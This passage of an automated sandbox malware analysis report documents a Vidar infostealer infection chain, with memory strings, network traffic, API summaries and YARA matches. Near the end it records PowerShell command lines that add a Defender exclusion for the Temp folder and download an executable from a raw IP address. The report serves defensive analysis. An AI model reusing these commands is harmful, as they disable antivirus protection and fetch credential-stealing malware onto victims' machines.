                    Source: chrome.exe, 00000020.00000003.3221883406.00005B38036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218020340.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216458930.00005B3803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216269253.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216521834.00005B3803670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216633834.00005B3803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                    Source: chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                    Source: chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                    Source: chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                    Source: chrome.exe, 00000020.00000003.3216746904.00005B3803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3221883406.00005B38036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218020340.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216269253.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3217054652.00005B380360C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                    Source: chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                    Source: chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49707 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49712 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49748 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49789 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49817 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49837 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49892 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49902 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49915 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.6:49921 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.198.119.84:443 -> 192.168.2.6:49954 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004050F9
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,26_2_0076F7C7
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,26_2_0076F55C
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,14_2_004044D1
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00789FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,26_2_00789FD2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 26.2.Inf.com.41e0000.1.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\putt.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0070FFE0 CloseHandle,NtProtectVirtualMemory,26_2_0070FFE0
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00764763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,26_2_00764763
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00751B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,26_2_00751B4D
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,14_2_004038AF
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0075F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,26_2_0075F20D
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeFile created: C:\Windows\NortheastPresenceJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeFile created: C:\Windows\FascinatingFeeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeFile created: C:\Windows\FinishedMistressJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346AA6123_2_00007FFD346AA612
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346A891B3_2_00007FFD346A891B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346AB0FA3_2_00007FFD346AB0FA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346A16D13_2_00007FFD346A16D1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346A72FB3_2_00007FFD346A72FB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346A8EFA3_2_00007FFD346A8EFA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346A44453_2_00007FFD346A4445
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346ABBF33_2_00007FFD346ABBF3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34774AF63_2_00007FFD34774AF6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD346A16C99_2_00007FFD346A16C9
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_0040737E14_2_0040737E
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_00406EFE14_2_00406EFE
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_004079A214_2_004079A2
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_004049A814_2_004049A8
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0071801726_2_00718017
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0070E14426_2_0070E144
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_006FE1F026_2_006FE1F0
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0072A26E26_2_0072A26E
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_006F22AD26_2_006F22AD
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0070C62426_2_0070C624
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0072E87F26_2_0072E87F
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0077C8A426_2_0077C8A4
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00762A0526_2_00762A05
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00726ADE26_2_00726ADE
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00758BFF26_2_00758BFF
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0070CD7A26_2_0070CD7A
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0071CE1026_2_0071CE10
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0072715926_2_00727159
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_006F924026_2_006F9240
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0078531126_2_00785311
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_006F96E026_2_006F96E0
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0071170426_2_00711704
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_006F9B6026_2_006F9B60
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00717B8B26_2_00717B8B
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00717DBA26_2_00717DBA
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\putt.exe 0F9003739FC0213FF837F03F9C1CE4C835E3AAB255C94D388AEFB9D9B985CB2D
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: String function: 004062CF appears 58 times
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: String function: 0070FD52 appears 40 times
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: String function: 00710DA0 appears 46 times
                    Source: 26.2.Inf.com.41e0000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@91/168@25/12
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_007641FA GetLastError,FormatMessageW,26_2_007641FA
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00752010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,26_2_00752010
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00751A0B AdjustTokenPrivileges,CloseHandle,26_2_00751A0B
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,14_2_004044D1
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0075DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,26_2_0075DD87
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_004024FB CoCreateInstance,14_2_004024FB
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00763A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,26_2_00763A0E
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\AuthorizationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2612:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30xceyeq.gzk.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" "
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: Inf.com, 0000001A.00000002.3399122484.000000000101A000.00000004.00000020.00020000.00000000.sdmp, 1NG4W4EKN.26.dr, OZUAIEKXT.26.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skript.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
